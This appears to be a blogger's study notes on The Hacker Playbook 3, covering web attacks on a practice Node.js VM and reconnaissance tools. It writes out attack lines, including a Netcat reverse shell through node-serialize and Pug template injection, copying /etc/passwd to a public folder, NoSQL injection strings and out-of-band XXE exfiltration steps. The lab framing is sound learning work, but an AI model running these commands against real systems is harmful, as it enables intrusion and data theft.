The frequent mention of writing up your results well is a big part of why I’m sharing my THP3 notes and trying to blog somewhat consistently about info sec stuff. This is less formal than I would make bug reports, but it’s helping me internalize what I learn and given all the academic writing I’ve done, formal writing is less of a concern. Kim provides a link for a report generation form that can also be helpful.

Web Attacks Introduction – Cyber Space Kittens

So at this point, Kim has led us through recon and discovery (or enumeration) of the target website – Cyber Space Kittens (CSK). There is another VM provided for the web app exploitation exercises. That’s 2 so far for this book. If you are doing much with VMs, you may want to consider an external hard drive to store them or they may eat your hard drive.

Kim walks you through adding the VM to your hosts file. This was nice to have included because it’s often a must do when you are working on a host-only network. And since I’ve previously found some tools play nice with IP and some play nice with URL, this is a vital step for practicing. To do this, you have to edit the /etc/hosts file and add a line to identify the host – <IP address> <name>. Remember you may have to edit the IP later if you shut things down and come back. It’s pretty straight forward, but to give you an idea of what it might look like:       localhost    vulnerablemachine    anothervulnerablemachine

Side note here – if you aren’t familiar with the various text editor options in Linux, you might want to make a note. Kali has Leafpad and Vim is also common. I like this reference by Christopher Kielty as a quick guide. It’s good to be familiar with several since you may get a shell on a machine with an editor other than the one you are most comfortable with.

The Red Team Web Application Attacks

Some rehashing here with a few links. One was to a checklist. Lots of bitly links, which are always an adventure since you really don’t know where they are going. Kim also states the older books were focused on how to test web apps, so this one will skip the basics and move into attacks used in the real world. It’s fine, but it bugs me. I went digging to see what the differences might be and how the books are supposed to be regarded as a group. Based on this reddit, it seems to be a bit of both editions and series. Looking at it a little more, I picked up the Kindle version of THP2 because it looks like a good reference and I like how Kim approaches things. Pardon that squirrel chasing – back to the book at hand.

Setting Up Your Web App Hacking Machine

The vulnerable app is written in Node.js, which is popular for several reasons – fast, cross-platform, etc. Kim does a good job explaining why Node.js was his choice. Basically it’s popular, has a ton of open source libraries, and some of those libraries are vulnerable.

Kim lists some browser extensions – Wappalyzer, BuiltWith, and Retire.js. I’m familiar with the first 2. Retire.js is new and seems to be available on Chrome and Firefox, but not as extensions from the store. Both have something available, but not from what seems to be the original Github. There are also Burp and ZAP plugins, so that looks helpful. And since I can trace that back to the Github developers, I’m a little more comfortable with it. Note, these aren’t on my version of the THP3 Kali build, so you may need to install them. The VM also doesn’t have Chrome, so it’s going to take some time to get set up in the VM for this. I like having both Chrome and Firefox available for testing, and I do switch over to a Windows box at times.

I’m not thrilled with the permissions for the Retire.js add-on in Firefox, so I’m going to use the one from the Github. This uses the Add-On SDK for Mozilla, so that isn’t great for long-term usage. And looking at what it needs, I think going with the BurpSuite and ZAP plugins are the most efficient option for my usage. Unfortunately, the BurpSuite plugin only works with pro, and that’s not something I’m doing quite yet. I suspect I’ll end up buying it later, but I need to be a little farther along with my bug bounty work to justify the expense. I use the BurpSuite free version frequently though, and there are a lot of really nice features. Adding to ZAP was simple – download, open ZAP, File > Load Add-on File.. > Choose file. Then check to make sure it worked by clicking on the “Manage Add-ons” icon (3 little squares) to see if it’s listed.

I also recommend using Foxy Proxy – it will make your life much easier as you need to turn proxies on and off. It can be installed from the add-ons store in either Chrome or Firefox. And remember that Burp and ZAP running at the same time will conflict. If your listener isn’t working, make sure you didn’t forget to close the other one.

Web Discovery

Once you have your target, it’s time to start enumerating it. You can spider with BurpSuite, and I’ve found it to work well. It’s also helpful to use as a proxy, and the Decoder tab comes in handy. But there are a fair amount of things only available on the paid version.

I haven’t used OWASP’s ZAP as much, but it’s worked well when I have used it. It’s setup similar enough to Burp that you can adjust between the two fairly quickly. There are also plenty of resources available at the ZAP project page.

DirBuster is inactive, but gets the job done. It is also available as a ZAP add-on, so that is probably the way to go.

GoBuster worked well and quickly. I like being able to designate which status codes are deemed positive, and there is an options to check for extensions. I’ll likely play with this one more.

Running through the tools, you can see multiple vulnerabilities in the chat VM. Kim notes that for an audit or pen test, these vulnerabilities would be reported. However, for red team purposes, these will be ignored to focus on things that would get advanced access, shells, or results in data leaks. As someone still learning the specifics of pen testing vs. red teaming, I found this info helpful. And it makes sense since red team being a more long-term approach, things that could result in the biggest issues (and fines) would understandably be the focus.


Cross-Site Scripting (XSS) testing takes time and is a popular target for bug bounties. If you aren’t familiar with a lot of the basic exploits, Hacksplaining has nice introductory lessons. Web for Pentester is another good place to work on the basics. I’ll be using that to test out some of these exploits as well since I’m working on that to improve my web app hacking

Kim starts off with basic attacks since they aren’t really harmful (that doesn’t mean it’s cool to go out and do these where you aren’t authorized to do so) and provides info for a basic XSS, cookie stealing XSS, forcing a file download, redirecting a user, and another script to enable key loggers and other capture options. This portion has text and then a series of exercises, so I’ll have notes on the text and then the exercises.

Resources for obfuscating payloads for XSS

WAHH goes into more detail about avoiding XSS filters and does a good job explaining what may work and why. Kim notes that not all JavaScript payloads require the <script> tags, so you can avoid filters looking for those tags. Kim provides a reference for what HTML Event Attributes for more info and directs you to try it out in the chat VM.

Get things set up, login, go to the chat…basic script works as expected (entered in the chat, not in the URL). All of these were straightforward. Note that the onload command waits for everything to be loaded, so there may be a time delay or refresh needed. Kim includes links to an archived XSS Mind Map by Jack Masa and an HTML 5 Security Cheatsheet that shows what vulnerabilities various browsers have. The section ends by introducing polyglot payloads that can avoid a lot of the input validation checks. The provided reference about polyglot payloads from 0xSobky – Unleashing an Ultimate XSS Polyglot provides a really nice rundown. Playing around with the polyglot payload in the book, it has 2 alerts. You can put indicators (like alert(1), alert(2)) to determine which alert made it through input validation. This should let you narrow down what’s being done to refine your exploit. Until you get used to it, you might want to keep a URL encoding reference handy, like this one from w3schools to help with avoiding input validation.

BeEF (Browser Exploitation Framework)

BeEF is a fairly popular tool. I tried in on a couple of different examples on the Web for Pentest from Pentester Labs. It seems pretty straightforward – find a way that XSS can be exploited and pop the BeEF script in there. Same thing for the chat VM. BeEF gives you full control of the target’s browser, so there’s a lot you can do. It’s going to take some time to go through all that BeEF can do, but it’ll be a good tool to get familiar with. BeEF can also be set up to work with Metasploit, which looks like a great additional option.

Blind XSS

Blind XSS is difficult to detect because it’s not visible to the attacker or user – just the admin or a back-end employee. XSSHunter is the recommended tool. It does require an account and creation of a custom subdomain. I believe this means both VMs will need to be connected to the Internet rather than in Host-Only mode. Switch the network adapters over if necessary, go through account creation and…the basic script worked fine. I did have to refresh the page to see the website (under the XSS Fires tab). The site also has multiple other payloads available. This will be fun to use on the Web for Pentester VM to see how some of the other payloads function. Some additional reading on blind XSS basics.


Kim stats DOM-based XSS is a little less straightforward than other types. I agree. DOM (Document Object Model) XSS is based on being able to manipulate client-side scripts. Browsers don’t understand HTML, so an interpreter puts HTML into DOM. Looking at the source code as instructed, you can see a spot where the code says '': '+msg.msgText+' where you would expect to see your username and message in the message window. You don’t see the alert payload directly, which makes it harder to find where you may need to adjust the payload or where it’s executed. Definitely something to go play with some more in my other web app hacking tools.

Advanced XSS in NodeJS

Defending against XSS is difficult. You can’t just filter specific characters or words. And WAHH talked about how if the input validation is just looking for <script> you can change to <scRipt> as seen in the polyglot example to avoid that check. All languages have different things they are susceptible to, including NodeJS. The particular package used to build the chat VM doesn’t have built-in XSS protection unless it’s rendered through the template engine. A template engine results in XSS vulnerabilities being found through buffered code and string interpolation.

Template engines basically have spots to use for string variables (string interpolation). Pug can use both unescaped (!{}) and escaped (#{}) string interpolation. When escaped string interpolation is used, characters like < > ' " are HTML-encoded. Unescaped string interpolation typically results in XSS vulnerabilities. Escaped interpolation can result in XSS vulnerabilities if passed through JavaScript. In JavaScript, anything following != will be executed as JavaScript. And anytime you can insert raw HTML there may be XSS vulnerabilities.


Exercise 1 was an example of good string interpolation with no real options to escape it. To determine this, a basic alert was entered and then the source code was viewed to see how the script was handled.

Exercise 2 showed unescaped string interpolation. Enter the basic alert exploit, submit it, get the alert. Then view the page source code to see how the script was handled.

Exercise 3 shows dynamic inline JavaScript with escaped string interpolation. The input is inside a script tag before the escaped interpolation. This means the JavaScript will automatically execute. Since it’s already in a script tag, you don’t even need to use the script tags. Putting quotes around the interpolation would have protected against this vulnerability.

Exercise 4 is unescaped buffer code. There’s no escaping, so it’s vulnerable by design.The basic alert script will work here.

Exercise 5 is escaped string interpolation into escaped dynamic inline JavaScript. The app is doing some minimal filtering, but the escaped string interpolation is in a script. You have to figure out how to escape the filtering. This can be done using “esoteric” Javascript. Basically, a bunch of [][(!-)] craziness. I’ve seen this before, and it’s definitely something to copy/paste. Kim provided a reference that will create this notation.

Overall, it’s difficult to protect against XSS. Understanding context and if escaping is required is critical to understanding the vulnerabilities. All languages have issues with XSS, so you have to understand the language and framework. This is why running things like Wappalyzer and BuiltWith and viewing source code is important.

XSS to Compromise

Once you’ve got a vulnerability, getting to shell is of course desired. Getting a user-to-admin style XSS in a CMS or similar can lead to complete access. Kim references a walkthrough by Hans-Michael Varbaek that has quite a bit of info. BeEF has exploitation using JavaScript. And a cool thing you could do is put a JS XSS payload on a victim machine, get the internal IP, and scan from there with the payload.

NoSQL Injections

It was nice that this section didn’t focus on SQL injections. Kim covered SQLMap in THP1 and 2. I’ve used SQLMap and found it worked well. NoSQL is focused on in THP3 because it’s becoming more prevalent. The typical SQL databases (MySQL, MSSQL, and Oracle) are relational, while the NoSQL version usually isn’t. NoSQL injections may work differently than traditional ones, and often are found with string parsing. A typical injection would be {"$gt":""}, which essentially says GT (greater than) is greater than “”(NULL). This is equivalent to the standard SQL injection of ' or 1=1--.

A few other NoSQL injection resources…

Attack the Customer Support System NoSQL Application

Use Burp and try try logging in with random info, see what info you get. You can see the username and password attempt being passed. You might be able to put a conditional in there to basically do the traditional SQL injection attack. You won’t see the server-side source code in a black-box test, but you can expect there to be a query to the backend database, MongoDB in this case. So looking at this, it makes sense. All you have to do is edit the request as it proxies through Burp – pretty straightforward. Putting the NoSQL injection of {"$gt":""} in for the admin password, you can see some input checking in Burp. That’s easy enough to edit and get admin access.

Kim goes on to emphasize the discussion of NodeJS is showing the ways new vulnerabilities can be introduced by newer frameworks and languages. One way this occurs for NodeJS is the qs module – it converts HTTP request parameters into JSON objects and is used by default in Express. This is important because on the server side, POST requests will be converted to JSON if bracket notation is used. Good to know. The edit here is a little different – the exploit goes before the =. So you get password[$gt]=. This syntax can also be used to get usernames. Just stick in the same thing, and you should be able to go through each user in alphabetical order. This works and is begging for a script to automate it. You do have to remember to include the previous user in the exploit:


I found the same reference Kim provided when looking for more info Hacking NodeJS and MongoDB. The Websecurify author has a couple projects to work on NodeJS hacking that should be good references, and they use Docker, so it has the added bonus of getting more experience with that.

Deserialization Attacks

I haven’t done much with deserialization, so I looked over the OWASP Deserialization Cheat Sheet to get some general info. From that info, serialization is putting an object into a data format that you can restore later (save, send, etc.). Deserialization is the reverse – rebuilding the data into an object. This is most popular with JSON right now; it was XML previously. Coding languages have native ways of serializing objects, which offer their own opportunities for exploitation.

Back to THP3 and dealing with NodeJS…serialize.js is being used, which is upfront about being a potential security issue. You can pass untrusted data to the serialize() function to get arbitrary code execution. The serialize.js library uses eval(), which will execute raw JavaScript. Not a great option for user input. You need to create a serialized payload to be deserialized and sent through eval() to execute the JavaScript payload. More info and the JavaScript payload can be found on Opsex’s blog.

The walkthrough starts with a nice feature of Burp – the decoder. I find this pretty handy and easy to use. Drop the cookie into decoder and Base64 decode it. It shows up as {module":"node-serialize"}, so you can see the serialize module is being used. Since you can’t write directly to the web directory and have it accessible in NodeJS using Express and Pug like you can in PHP, there must be a specified folder path exposed to the public internet. (Seriously, just tips like this make this book worth reading. And seeing how Kim approaches things is helping me understand how to do this job.)

Side note…as of Firefox 52, there is captive portal detection that can be extremely annoying to click through when using Burp to proxy. You can tell Burp to ignore it or turn it off in Firefox. More info can be found here, but good grief that was annoying.

The walkthrough worked with no problem. Kim recommended doing some post exploitation, including reading the /etc/passwd file. I played around a little and had no issues executing Bash commands this way. I decided to get adventurous and try popping a shell. I thought I could use msfvenom. I found this msfvenom cheat sheet which is a nice, concise reference. I’ve used it before for php payloads, and it works well. It gave me an error, so I decided to do some more research. I found this method by Wiremask to get a reverse shell, it’s not quite what I’m working with, but I want to hang on to the link for future reference.

I thought about what I was doing and decided to try getting a shell with Netcat. Using a basic Netcat reverse shell, I was able to get a connection, but not an interactive shell. I remember running into this info before, so I popped up my notes, and found the way I got the shell using Python thanks to pentestmonkey. Once I got the interactive shell, I decided to look around a bit. But not long because I need to continue with the chapter.

So I’ll remember, here are the pertinent parts for getting the /etc/passwd file and getting a shell with Netcat. These just need to be put in the basic exploit and then into whatever way you are using the exploit.

  //Basic exploit portion, may need to be put into other things
  require('child_process').exec('stuff you want done')
  // The exec() portion to get the /etc/passwd file:
  exec('cat /etc/passwd >> /opt/web/chatSupportSystems/public/hackedpass.txt', function(error, stdout, stderr){console.log(stdout)})
  // The exec() portion to get a Netcat reverse shell
  exec('nc <hostIP> <hostPort> -e /bin/bash', function(error, stdout, stderr){console.log(stdout)})

Template Engine Attacks – Template Injections

Template injection is passing user input into render templates, so the underlying template can be modified. This is rarely unintentional and may be misinterpreted as XSS. This can also allow you to access the underlying OS to get remote code execution. You can use newline characters in template literals, which is needed for this exploit to get out of the paragraph tag because, like Python, Pug is space/newline sensitive. Kim points to Server-Side Template Injection by James Kettle as a good reference.

Template Injection Example

The walkthrough was pretty straightforward – you have to figure out if the input supplied can process basic operations. First up was trying a basic XSS script in the user field of DMs in the chat VM. That worked, so there’s an XSS vulnerability. Next question is can you interact with the template?

Checking this included use of Burp Repeater and swapping in a couple things to see if it would execute basic math. If you haven’t used it, Burp Repeater does what you would think – pick something and you can mess with it and submit it repeatedly through Repeater without having to go back to your browser. Big time saver and very useful. Looking at the portion that was passed related to the template (ti), you can see that the part where the input is used is wrapped in paragraph tags. So if you can escape those, the exploit may work. Since Pug is space/newline sensitive, a newline should do it. There was some URL encoding needed – %0a for new line and %3d for =, but the easiest way to deal with it is put what’s needed in Burp’s decoder. The first test will be just a newline, then some basic math.

So in Burp decoder, enter this and choose to encode as URL:


If this works (you get 81 outside of the paragraph tags), you have access to the global object. To get from here to shell execution, you have to find the right function to execute. First up is checking out the self global object root so you can see what you have access to. Eventually, you want to get back to the Require function to import the child_process.exec exploit to run OS commands. So after checking if you can access the global object, you need to parse it.

  each val,index in global
    p= index

Kim states from here on it’s trial and error to see what will work. He says to pick “process” out of the methods because it will eventually get us to ‘require’. You can check out the various methods you have access to by adding .<method> after global above. Then you can add another .<method> to check out the methods available in the process methods. Find require under the mainMethod, and try exploiting it. Remember to URL encode this before putting back in Burp repeater.

  - var x = global.process.mainModule.require

Enter whatever commands you would like, similar to those found in the Deserialization portion. The - at the beginning of the line denotes the variable will be hidden.

I used a basic Netcat reverse shell then used a python exploit (the same things mentioned above) to get an interactive shell. So these were the commands required…

In the systems commands portion of .exec:

  nc <hostip> <hostport> -e /bin/bash

On the host:

  nc -nlv -p <hostport>
  connect to <hostIP> from <targetip>
  python -c 'import pty; pty.spawn("/bin/sh")'

This section wraps with a mention of Tplmap that is similar to SQLmap. This worked fine and returned several injections that worked. It lists the plugins used, so that will be helpful for looking at specific exploit options.

  ./ -u '<urltocheck>'

JavaScript and Remote Code Execution

Remote code execution (RCE) is a goal for pen testing and is most commonly found where uploads are allowed. Kim provides a reference on Github for webshells with the caveat that they should be used at your own risk. Second this – validate webshells as best you can by looking at the code, finding multiple references, etc. Digging around in hacking definitely leaves you exposed, so be mindful of that.

Attacking the vulnerable chat application with upload

I’ve done file upload exploitation in PHP before, but there are differences in how to do file upload exploits depending on the platform involved. In Node, you can’t just call a file in the browser to execute like PHP, so this will be a little different. This exploit will use a dynamic routing endpoint, which will read the file assuming it’s a Pug file. This gets back around to the Netcat shell I’ve been doing, but requires putting it into a text file. Then upload it to the VM, get the hash, and navigate to that filehash using drouting to trigger RCE. Pretty straightforward, but following Kim’s commands, Netcat wasn’t in verbose mode, so it was hard to tell when the shell connected. I prefer adding the v option so you can see what’s going on. This didn’t give an interactive shell, so I used the handy python option to elevate to a regular shell.

A couple of key points on where to find things…you will need to go to the HTTP history tab on the Burp proxy tab to retrieve the filehash. It may be buried and easy to miss, so using the search feature might be helpful. Depending on how much you’ve forwarded in the Intercept tab, you may need to go back. Look for a URL with “fileupload” in it to find the info you need. The drouting module was identified in the HTML as something to be removed in production, so that would be a clue to investigate more in an actual pen test or red team situation. Looking at the code Kim provided, I this was a specific app.get method added to test dynamic routing that is somewhat unique. I haven’t been able to find references to it elsewhere, so it may be one an example of why checking out the source code and doing some trial and error based on what you know is so important.

Server Side Request Forgery (SSRF)

SSRF is used for access to the local system, internal network, or pivoting. I wanted a little more info – OWASP SSRF and a blog from Acunetix gave me enough info to move forward. Kim says this type of exploit is often kind of ignored and thought of as not a big deal, but from his explanation, it can definitely lead to some serious damage because you can gain access to the internal network. Kim provides a presentation from Agarri as a reference. Definitely some good stuff there.


This used the DM option. Put in a link, preview it, see what happens. You can set it up to view as local host. Once you are there, you need to see what’s available. This is done with Burp Intruder. Kim narrows down the ports (thank goodness – the free version does intruder, but it is throttled – this is one of those features that will likely get me to invest in the pro version), and you let it run. I’ve done this before and one of the things to watch for is a response that looks different from the others. In this case, one of the ports (28017) sent a much longer response and should be investigated. You can plug that port number in where the previous one was and get into the mongo db. Once you are in, you have to continue using the exploited local interface in the link to go to the other links – just pop the info at the end of the URL.

Relatively straightforward and good practice with Intruder. I wanted to see if I could do something similar with Zap. Close Burp, fire up Zap. Run through the same thing to get the URL into Zap. Right click on it, then choose Attack > Fuzz. Highlight the portion you want to fuzz, pick your payload, and start the fuzzer. It ran very quickly, and highlighted the abnormal response. You can choose to send that URL directly to Firefox, and there’s the mongo db again. I still think Burp is something worth investing in, but it’s nice to be able to figure out how to do similar things in Zap as well. I’m a believer in having multiple tools at your disposal.

XML eXternal Entities (XXE)

Next on to some work on attacking XML parsers. This is comon in apps allowing file uploads, parsing Office docs, JSON, and Flash. With improper validation, XML parsing can load to all kinds of problems. Some additional reading from OWASP, the OWASP cheat sheet, and Infosec Institute. This gets a new VM (are you putting your VMs on an external hard drive or lab machine yet?) since it has a custom configuration request. Fire up the VM, run Burp, check out the source code. See a hidden field submitted with a POST request. The user can control the POST data, so you can inject malicious code. And most XML parsing libraries support SYSTEM, which allows data to be read from a URI. So you can put in specific info to exploit the XML being parsed. This worked fine to read /etc/password. I didn’t get it to execute a Netcat shell. I tried looking at some other common Linux files and was able to access those. So I think it’s just figuring out what exactly you can access.

Advanced XXE – Out of Band (XXE-OOB)

If you couldn’t see the response or had other issues, you can go out of band by using a remote Document Type Definition (DTD). This is an XML file that defines the structure and legal elements of an XML doc. This is a four stage attack:

  1. Modified XXE XML attack

  2. Get the target to load a DTD file from the attack server

  3. Read the /etc/passwd file using code in the DTD file

  4. Get the data using code in the DTD file

No luck though – I checked everything multiple times. I was getting a warning about a failure to open a stream, so it seems like it’s not getting the file for some reason. This was a different error than Kim warned about. I’ll have to do some digging to figure out what’s going on.

Doing some troubleshooting…using the exact phrasing as the book, I got a connection refused error. Spent some time thinking about the errors (connection refused) I was getting and how to address them. I was pretty sure I needed to set up a server/listener of some type to allow my target to access the file. I did some searching on XXE-OOB and found a nice walkthrough by ZeroSec. I tried specifying the port in Burp Repeater, and that got a connection and GET /payload.dtd HTTP/1.0 followed by Connection: Close. This was using the same port for the payload file and in Repeater.

Next I popped up a basic Python server to see what would happen. I got a 404 error. I pulled up my host in the browser to see what directory it was dropping me into. It was not the typical var/www/html folder. This is how the SimpleHTTPServer (Python 2, http.server in Python 3) functions. You can set the directory using pushd or by moving to the desired directory . Because of how SimpleHTTPServer is set up, it will serve files from the working directory. It shouldn’t be used for production environments, but it gets the job done for this. Using this, I was able to get the file I was targeting.

Here are the steps I had to take to do the XXE-OOB exploit:

  1. Create the payload file. Put in ~ or specify the directory when setting up the Python server.

  2. Start the Python server:

      //Using current directory
      python -m SimpleHTTPServer 80
      //Using /var/www/html or cd to /var/www/html
      pushd /var/www/html; python -m SimpleHTTPServer 80; popd
  3. Start a Netcat listener nc -lvp 8888.

  4. Deliver the payload using Burp Repeater.

  5. See the payload being accessed via the Python server.

  6. See the Base64 encoded delivery on the Netcat listener.

  7. Copy/paste into Burp Decoder to see the /etc/passwd contents.4

I’m not sure if Kim didn’t have to open up a server or just presumed the reader would know to do so. But I got it working and learned a simple way to set up a server using Python that will definitely come in handy. Had I been working from my AWS instance, I would have been fine since it’s already setup to allow access.

Lessons Learned

Cool chapter – I feel like I learned a lot about exploiting some of the newer technologies being used. It was nice to realize that I am familiar with a decent amount of the things covered or could at least connect them with other contexts. Lots of different ways of doing attacks I’ve seen before and good reinforcement. Plus some good hands-on experience with deserialization and template engine attacks. I feel like reading the chapter, then going back and doing the labs and typing my notes is working well.

Next Steps

  • Keep working on the more common web application attacks

  • Find a bug bounties to practice on

  • Keep working on the other web app hacking stuff I’m doing

  • Apply the attacks learned here to the other web app hacking labs

  • Continue working on programming skills

Posted in Blog, Resources

THP3 Ch 2 Review

Picking up with chapter 2 in The Hacker Playbook 3 by Peter Kim (ch 1 notes here). I’ll be doing most of this on the provided VM. Partly for the tools already being (mostly) there, partly because I don’t want to mess up the VMs I have set up to my liking. I’ll add the tools I like later, but I’m finding a lot of resources list tools that are no longer in Kali (like Vega). I’ve got a BlackArch VM (which comes with just about all of the things I’ve found that aren’t in Kali anymore), so I may use that to continue working with some of the tools.

Disclaimer: Criminal/unauthorized hacking bad. Jail bad. Read CFAA. IANAL. Don’t do things you shouldn’t.

Nmap diffing

This chapter starts off with Nmap, which is something I’m fairly comfortable with. But this is using it to keep track of changes on the network. Cool idea, but seems a bit noisy. The author provides a script for it. From a blue team perspective, this is something your SIEM should be able to do. I like the idea of watching a network for differences, maybe even setting up an alert to watch for a specific port or service to become available. But I also know using Nmap to scan some networks (like ICS networks) is not a good idea if you care about things staying online and functional, so looking into other options would be a good idea. Perhaps something like GRASSMARLIN would be a good option for diffing ICS and SCADA networks. I’ve used it in training, and it’s pretty slick.

Kim recommends improving on the provided Nmap script by checking different ports, doing some banner grabbing, etc. Depending on what’s on the network you are targeting, there is a good chance you may need to check something outside of the default Nmap scan, so adding some port specifics to the script would be helpful. I’ll file that away. Writing scripts is something I want to get better at, so that aspect of this this book will definitely be good for me.

Web screenshots

Some cool stuff here – HTTPScreenshot and Eyewitness are both pretty straightforward. I’m not convinced these offer a lot of utility over some of the tools discussed in Michael Bazzell’s Open Source Intelligence Techniques or available on his website, but I can see using all of the tools in different situations.

With HTTPScreenshot, I got a bad range spec for the URL I was scanning. I had it entered in the text file as specified, so that was a little frustrating. I ended up doing an nslookup to get the IP address. Shoved that into the networks file, and it worked fine. I’m not sure if you have to use an IP or CIDR notation to make it work with the ./ option, but that’s what I had to do. I tried doing just the httpscreenshot option, and got a permission error. I checked the permissions on the file, and I didn’t have permission to execute the file. I found that odd. I had to chmod the file, but then it worked fine.

EyeWitness worked like a charm. No issues there, but remember your scope when you are putting in your target info. This scan consists of OSINT, so it’s “ok”, but it’s something you should always be aware of.

Cloud Scanning

This is a cool section. There’s no denying the importance of cloud infrastructure. Kim noted that many tenants can use dynamic IPs, so servers may change IPs and aren’t necessarily even going to be in the same block since you can set up your instance all over the world. There are references provided for where the big cloud providers have their IP ranges (Amazon, Azure, and Google Cloud).

Network/Service Search Engines

Basically ways to find things. Shodan is cool. You do need an account to search things, and there are various levels available that allow you to do more things. I picked up a lifetime membership for $5 on Black Friday. It included an ebook on how to use Shodan, so I’ll be digging into that more. It’s a powerful tool that can provide a scary amount of info. I noticed with my initial playing around that searching by IP gives a lot of detailed info. The IP might change, but if the target is using a baseline image, getting this info on one IP may provide some good info even if the IP later changes. was a new one to me. It’s the same basic idea as Shodan – scan all the things. My VPS showed up here by domain quicker than it did in Shodan. Censys does not require a log in of any type, which is nice. Kim also identified a script tool available to use with Censys to find subdomains.

For both, I went through the domain in the book and my VPS domain. Then I spent some time searching different things to see what the different options are. I think the big thing with these is knowing what they are and what they can help you see so when you are working on a pen test or bug bounty you know your options.

Manually Parsing SSL Certificates

I got info on certs from both Shodan and Censys, but having a manual option is good. This was a Python scraping tool – sslScrape. It’s a neat little tool written by Kim and bbuerhaus. One thing I’m coming back to as I work through these tools is that I have to keep working on my coding skills so that I can develop my own tools.

Subdomain Discovery

Subdomains are more difficult to determine, understandably so. But the info is important because it can indicate server type, some servers don’t respond by IP, and it can give info about where servers are hosted.

Discover Scripts was the first tool. It combines all the recon tools in Kali. It has quite a few options and is still maintained as of November 2018. You can also add API keys for several tools (including Shodan) to improve the results from recon-ng. It’s not required, but would be advantageous. I’ll add that to my list of things to do… It does take the info found and dig deeper, so this is another tool where you’ll want to be mindful of scope. There is an ./ script that needs to be run from within the Discover Scripts folder – be prepared to wait awhile while that runs. And by awhile, I mean start that sucker and go to lunch or something. It shouldn’t always take forever, but it can if you haven’t updated in awhile.

I found the syntax a little hard to follow from the ReadMe and the book, so I’m including it here in a way that makes sense to me. This is from download through a domain search:

git clone /opt/discover
cd /opt/discover
...a bunch of options
...options for your choice
...more options

Wait a minute and it will pop up a list of choices. They are relatively self-explanatory. Enter the number of your choice, and go through the choices as needed. For a domain passive domain scan:

cd /opt/discover
Choice: 1
Choice: 1

Then let it do its thing. This will also take awhile (I’m sensing a theme here). You’ll get some red, generally related to not having API info. Then it pops out a report. You hit enter to open the report – be patient because (surprise!) it takes a bit of time to open the many, many associated Firefox windows. Pretty cool stuff. The report is saved to the /root/data folder for reference. I found a walkthrough from that may be helpful as well.

Knock was straightforward and will accept a VirusTotal API key. This uses a wordlist to see if the subdomains resolve, so you need a comprehensive wordlist. Kim suggests one from jhaddix. There’s a SecLists listing of wordlists on github. And there are quite a few already in Kali, possibly including the SecLists one depending on your install. This one also takes awhile. You get status codes for the subdomains. I think this would be a good option to send to a file – you can save to csv (-c, –csv; -f, -csvfields to include fields in first row) or JSON (-j, –json), or use the standard > to send to a txt file. (Nice little refresher on sending output here.)

Sublist3r does some google dork style stuff to search for subdomains. I got an error about urllib3 and chardet, quick googling brought me to a solution from Gloria Palma Gonzalez, which got the job done. Skip the sudo if you are already root.

sudo pip uninstall requests
sudo pip install requests
sudo pip uninstall docopt
sudo pip install docopt

The next tool, subbrute has now been integrated into Sublis3r – just add the -b option. I found this option to be very, very slow. Sublist3r by itself ran in a minute or so, the subbrute option took longer than my patience would allow. Running it separately also took a good while. I do expect it to take time since it’s going through a huge word list, but keep in mind the run time. Whether pen testing or doing a bug bounty, time is money so pick your tools accordingly. I ended up running it in verbose mode to verify it wasn’t hanging, and that also outlasted my patience. I decided to run a time test, because I want to have an idea how long things will take. This was running on the THP3 VM as provided. I went with 100 threads and basically walked away to let it do it’s thing. It took roughly…forever. I think it hung after about 18 hours, and I ended up killing it because it wasn’t making progress. This looks like something that would be better to run from a server, but my AWS instance is (likely) not built in a way to do the job much faster. I didn’t get great results with subbrute, so I’ll be exploring other options. I found a write-up saying it took more than 15 min to scan using a Digital Ocean instance that I’m guessing based on the price given has 4 GB of memory and 2 vCPUs. If you’ve got a VPS with comparable or better specs, you may get better results.

While digging into some stuff on subbrute, I found a nice write-up on discovering subdomains by Shpend Kutishaj of Bug Crowd. It had some good background and info on other tools, including a cool script by Jason Haddix that I’ll be experimenting with.

Kim also mentions MassDNS. This was labeled as experimental in its ReadMe. It also notes that the resolvers are outdated and a lot are dysfunctional. And it may result in abuse complaints being sent to your ISP. I ran it to see what it would do, but at this point, it’s not a tool that I’m likely to keep in rotation for general labbing and playing around because of the risks. It is very fast though, so I’ll save it for specific use cases.


Basically dig around on Github to see if anyone made an oops and pushed code or other sensitive data to a public repo. Search in Github or do a Google dork.

Some tools for searching Github

  • Truffle Hog – scans for high entropy keys; had to run a couple times to get it to work; probably would be a good idea to sent to file for review
  • git-all-secrets – combines open source git search tools to find all the things; requires an API token (Settings – Developer settings – Personal access tokens to generate); didn’t accept my token…

I tried several troubleshooting options with git-all-secrets. I got it to work with an API token with nothing allowed, but sometimes did have to start it a couple times. The key seems to be no spaces after the =.

docker run -it abhartiya/tools_gitallsecrets:v3 - repoURL= -token= -output=results.txt

The default for output is results.txt. When I changed it I got the message panic: open : no such file or directory. Then when I tried to copy the data after completion, I got an error that the container path specified didn’t exist. I think this has to do with the container and where I was trying to put the output file. Using the default, it worked fine using Kim’s syntax:

docker cp :/data/results.txt .

But it didn’t work with the syntax from the README, which is:

docker cp :/root/results.txt .

I’m not sure if this is because of the provided VM or not. I’ll have to try on a different VM, but moving on for now. Either version would put the results file in the /opt/git-all-secrets/ directory because of how the command line interprets the . (a good primer on using the Linux CLI is The Linux Command Line by William E. Shotts, Jr. – easy to read and helps you understand what’s going on behind the scenes). If you want it elsewhere, specify your filepath.

docker cp :/data/results.txt 

For reference, info about Docker commands was helpful for understanding what’s going on if you aren’t familiar with Docker. It does seem you can use the name of the container rather than the ID in the commands, which is much easier to do. I’m not as familiar with it as I would like to be, but that’s not a squirrel I want to chase at this moment.


When I went to use Slurp, it wasn’t on my version of the VM. Odd. So onto the google…apparently, slurp doesn’t exactly exist as linked anymore. The repo was removed by the owner. The account has been taken over by SweetRollBandit, who is using it to make a point about account takeover on Github. Checking the THP3 Updates, the repo has been copied and is now being maintained by nuncan. A bit of fiddling to get things going here based on the updates and the README.

<div>git clone /opt/slurp mv slurp/vendor slurp/src export GOPATH= go build cd /opt/slurp</div>

Then search as indicated.

./slurp domain -t
./slurp keyword -t 

Bucket Finder was much more straightforward. You just have to make the list of words to search for.Take the S3 buckets found and pop in browser to see info.

For the next part, you need an AWS account. This is where things get a bit icky if you are trying to maintain op sec. To get one, you need to provide email, phone, address, and credit card info. You can sort of get around it, but that’s not something I’m comfortable with. But I’m also not going to use the security key from my AWS account for anything other than these labs without knowing a lot more about how things are tracked within AWS. Yes, it generally shouldn’t be an issue for ethical hacking, but for situations where op sec might be needed, this may be something to skip.

